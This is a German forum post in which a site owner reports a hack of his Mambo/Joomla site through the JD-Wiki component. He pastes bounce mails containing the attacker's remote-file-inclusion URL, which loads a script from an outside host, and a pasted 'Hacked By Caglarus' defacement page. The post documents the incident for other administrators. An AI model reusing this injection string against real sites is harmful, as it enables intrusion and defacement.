LinkBack URL
About LinkBacks
Injection über JD-Wiki
Bei sind vorhin drei Bounce-Mails angekommen:
Inhalt der Mails:Return-Path: <MAILER-DAEMON@mx4.evanzo-server.de>
Received: from s121.evanzo-server.de (s121.evanzo-server.de [62.67.235.174])
by mx4.evanzo-server.de (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) with ESMTP id
k79HExR15712
for <webmaster@hollenbergs.de>; Wed, 9 Aug 2006 19:14:59 +0200
Received: from localhost (localhost)
by s121.evanzo-server.de (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) id k79H1wq19016;
Wed, 9 Aug 2006 19:14:56 +0200
Date: Wed, 9 Aug 2006 19:14:56 +0200
From: Mail Delivery Subsystem <MAILER-DAEMON@s121.evanzo-server.de>
Message-Id: <200608091714.k79H1wq19016@s121.evanzo-server.de>
To: webmaster@hollenbergs.de
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="k79H1wq19016.1155143696/s121.evanzo-server.de"
Subject: Warning: could not send message for past 4 hours
Auto-Submitted: auto-generated (warning-timeout)
X-UIDL: L7c"!I,o!!G!6"!+Ij!!
X-Text-Classification: mail
X-POPFile-Link: http://127.0.0.1:8081/jump_to_message?view=1280
**********************************************
** THIS IS A WARNING MESSAGE ONLY **
** YOU DO NOT NEED TO RESEND YOUR MESSAGE **
**********************************************
The original message was received at Tue, 8 Aug 2006 11:53:40 +0200
from wwwrun@localhost
----- The following addresses had transient non-fatal errors -----
Mr_hok@hotmail.com.com
----- Transcript of session follows -----
Mr_hok@hotmail.com.com... Deferred: Connection timed out with c17-ss-1-lb.cnet.com.
Warning: message still undelivered after 4 hours
Will keep trying until message is 5 days old
Die Datei war nicht durch "defined( '_VALID_MOS' )" geschützt. Ich habe das komplette Wiki inzwischen von meinem Webspace gelöscht.Return-Path: <webmaster@hollenbergs.de>
Received: (from wwwrun@localhost)
by s121.evanzo-server.de (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) id k789re211147;
Tue, 8 Aug 2006 11:53:40 +0200
Date: Tue, 8 Aug 2006 11:53:40 +0200
From: webmaster@hollenbergs.de
Message-Id: <200608080953.k789re211147@s121.evanzo-server.de>
To: Mr_hok@c17-ss-1-lb.cnet.com
Subject: http://www.hollenbergs.de/mambo/comp...fault/main.php Hacked
MIME-Version: 1.0
New web hacker
http://www.hollenbergs.de/mambo/comp...fault/main.php
inject e :
/mambo/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://towardspakistan.com/tmp/sikat.txt?
wkakakka goblok
Edit:
Diese index.php.x habe ich im Joomla-Root gefunden:
Pech für den Jungen: Die richtige index.php war schreibgeschütztHTML-Code:<html> <head> <meta **********="Content-Language" content="tr"> <meta name="GENERATOR" content="Microsoft FrontPage 5.0"> <meta name="ProgId" content="FrontPage.Editor.Document"> <meta **********="Content-Type" content="text/html; charset=windows-1254"> <title>Hacked By Caglarus</title> </head> <body bgcolor="#000000" text="#808080"> <p align="center"> </p> <p align="center"> <img src="http://i22.photobucket.com/albums/b313/sphere64/owned.jpg" width="726" height="353"></p> <p align="center"> </p> <p align="center"><font size="7"> Hacked By Caglarus</font></p> <p align="center"><font size="20"> ^_^ </font></p>
Zitieren
Lesezeichen